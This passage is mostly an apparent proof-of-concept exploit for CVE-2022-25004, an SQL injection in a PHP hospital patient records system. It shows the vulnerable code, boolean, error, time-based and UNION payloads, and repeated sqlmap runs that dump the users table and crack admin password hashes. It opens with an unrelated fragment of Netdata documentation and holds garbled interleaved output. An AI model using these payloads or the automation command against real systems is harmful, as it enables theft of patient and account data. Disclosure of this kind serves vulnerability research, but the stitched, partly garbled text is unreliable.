user that runs the Agent, which is typically the `netdata` user.
The `cloud.d/token` file should contain the claiming-token and the `cloud.d/rooms` file should contain the list of War
Rooms you added that node to.
The user can also put the Cloud endpoint's full certificate chain in `cloud.d/cloud_fullchain.pem` so that the Agent
can trust the endpoint if necessary.
|
## [CVE-2022-25004](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25004)
## [Software](https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html)
![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25004/Docs/Screenshot%202022-03-01%20095004.png)
## Description:
Hospital Patient Record Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /patients/view_patient.php.
The `id` parameter from Hospital Patient Record Management System v1.0 appears to be vulnerable to SQL injection attacks.
The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.
Status: CRITICAL
## Vulnerable code:
```php
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `patient_list` where id = '{$_GET['id']}'");
if($qry->num_rows > 0){
$res = $qry->fetch_array();
foreach($res as $k => $v){
if(!is_numeric($k))
$$k = $v;
}
$details = $conn->query("SELECT * FROM `patient_details` where patient_id ='{$id}' ");
while($row = $details->fetch_assoc()){
${$row['meta_field']} = $row['meta_value'];
}
}else{
echo "<script> alert('Unknown Patient ID.'); location.href = './?page=patients';</script>";
}
}else{
echo "<script> alert('Patient ID is required.'); location.href = './?page=patients';</script>";
}
$doctors_arr = [];
$doctors_qry = $conn->query("SELECT * FROM `doctor_list` where id in (SELECT doctor_id FROM `patient_history` where patient_id ='{$id}') ");
if($doctors_qry->num_rows > 0)
$doctors_arr = array_column($doctors_qry->fetch_all(MYSQLI_ASSOC),'fullname','id');
$room_arr = [];
$room_qry = $conn->query("SELECT * FROM `room_list` where id in (SELECT room_id FROM `admission_history` where patient_id ='{$id}') ");
if($room_qry->num_rows > 0)
$room_arr = array_column($room_qry->fetch_all(MYSQLI_ASSOC),'name','id');
?>
```
[+] Payloads:
```mysql
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4214 FROM (SELECT(SLEEP(5)))YwrA)-- gsSe&page=patients/view_patient
---
```
## All in one:
```mysql
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:57:34 /2022-03-01/
[11:57:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=blov3a6cmm7...5ljvdr4pu6'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1807=1807 AND 'uYTA'='uYTA
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6423 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6423=6423,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KEjB'='KEjB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3271 FROM (SELECT(SLEEP(3)))ySPv) AND 'vkzK'='vkzK
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5548' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717071,0x71687362656d5a76494d674d5741614e7542625946744c6c5370416b486e7374717953684d687950,0x71716a7671),NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:35] [INFO] testing MySQL
[11:57:35] [INFO] confirming MySQL
[11:57:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:57:35] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:35] [INFO] resumed: '0192023a7bbd73250516f069df18b500','admin'
[11:57:35] [INFO] resumed: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:35] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:35] [INFO] using hash method 'md5_generic_passwd'
[11:57:35] [INFO] resuming password 'admin123' for hash '0192023a7bbd73250516f069df18b500' for user 'admin'
[11:57:35] [INFO] resuming password 'stupid123' for hash '97a8afcf419cc231e1bdcd8584b0a246' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:57:35] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:57:35] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:57:35 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:57:39 /2022-03-01/
[11:57:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fgqostf9v6a...c07feq0430'). Do you want to use those [Y/n] Y
[11:57:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:57:40] [INFO] testing if the target URL content is stable
[11:57:40] [INFO] target URL content is stable
[11:57:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:57:40] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:57:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:57:40] [WARNING] reflective value(s) found and filtering out
[11:57:41] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[11:57:41] [INFO] testing 'Generic inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:57:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:57:41] [INFO] testing 'MySQL inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:57:41] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:57:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:57:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:57:48] [INFO] target URL appears to have 8 columns in query
[11:57:48] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3060=3060 AND 'WBCY'='WBCY
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(3263=3263,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZQSU'='ZQSU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9794 FROM (SELECT(SLEEP(3)))mBlw) AND 'oVQB'='oVQB
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5127' UNION ALL SELECT CONCAT(0x717a706a71,0x76436c4774624e78647045456f474773684944566f594345496f547a7146686e6477744e49516b51,0x71766a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:57:48] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:49] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[11:57:49] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:49] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[11:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[11:57:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:57:49] [INFO] starting 4 processes
[11:57:54] [INFO] cracked password 'admin123' for user 'admin'
[cblake11:58:04'8:04INFO] [] current status: affac... |INFO] cracked password 'stupid123' for user '
[11:58:07] [INFO] current status: brawl... \
[11:58:07] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:58:07] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:58:07] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:58:07 /2022-03-01/
Traceback (most recent call last):
File "C:\Users\venvaropt\Desktop\CVE-2022-25003\PoC-SQL-automation-all-in-one.py", line 26, in <module>
os.system('python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py -u http://localhost/hprms/admin/doctors/manage_doctor.php?id=1 -p id --time-sec 3 --dbms=mysql --batch --answers="crack=Y,dict=Y,continue=Y,quit=N" -D hprms_db -T users -C username,password --dump')
KeyboardInterrupt
PS C:\Users\venvaropt\Desktop\CVE-2022-25003>
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:01:23 /2022-03-01/
[12:01:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=62sg9tou51d...eqmgoe9q93'). Do you want to use those [Y/n] Y
[12:01:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:01:23] [INFO] testing if the target URL content is stable
[12:01:24] [INFO] target URL content is stable
[12:01:24] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:01:24] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:01:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:01:24] [WARNING] reflective value(s) found and filtering out
[12:01:24] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Sample Ward Room Good for 6 Patient")
[12:01:24] [INFO] testing 'Generic inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:01:24] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:01:24] [INFO] testing 'MySQL inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:01:24] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:01:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:01:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:01:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:01:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:01:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:01:31] [INFO] target URL appears to have 8 columns in query
[12:01:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8906=8906 AND 'Accs'='Accs
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1670 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1670=1670,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UIHB'='UIHB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6841 FROM (SELECT(SLEEP(3)))ujWo) AND 'sPMh'='sPMh
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-1901' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x626561436b5273424d6544724748464f566f6851426f484a464c666a777a4768724b61577878704f,0x71706b7671),NULL,NULL,NULL,NULL-- -
---
[12:01:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP 8.1.2, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:01:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:01:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:01:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:01:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:01:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:01:32] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:01:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:01:32] [INFO] starting 4 processes
[admin12312:01:38' for user '] [adminINFO' |
[cblake12:01:48'] cracked password 'stupid123' for user '
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:02:09] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:02:09] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:02:09 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:02:13 /2022-03-01/
[12:02:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4tp11beihnp...3genbf0lef'). Do you want to use those [Y/n] Y
[12:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:02:13] [INFO] testing if the target URL content is stable
[12:02:14] [INFO] target URL content is stable
[12:02:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:02:14] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:02:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:02:14] [WARNING] reflective value(s) found and filtering out
[12:02:14] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[12:02:14] [INFO] testing 'Generic inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:02:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:02:14] [INFO] testing 'MySQL inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:02:14] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:02:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:02:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:02:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:02:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:02:21] [INFO] target URL appears to have 8 columns in query
[12:02:21] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3105=3105 AND 'nrvQ'='nrvQ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5846 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5846=5846,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NGNn'='NGNn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4775 FROM (SELECT(SLEEP(3)))kUeP) AND 'LHyf'='LHyf
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-4962' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x47746f4c5467486944786f586c45764a6c59724e6c415375424f5246744c486c456b455055764c70,0x717a706b71),NULL,NULL,NULL,NULL,NULL-- -
---
[12:02:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:02:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:02:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:02:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:02:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:02:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:02:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:02:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:02:21] [INFO] starting 4 processes
[] [12:02:30INFO] [] cracked password 'INFOadmin123] current status: 19051... \' for user 'admin'
[12:02:36] [] [INFOINFO] cracked password 'stupid123] current status: 70891... -' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:03:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:03:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:03:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_patient.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:03:05 /2022-03-01/
[12:03:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3timnfi1ddl...4mandk4la0'). Do you want to use those [Y/n] Y
[12:03:06] [INFO] checking if the target is protected by some kind of WAF/IPS
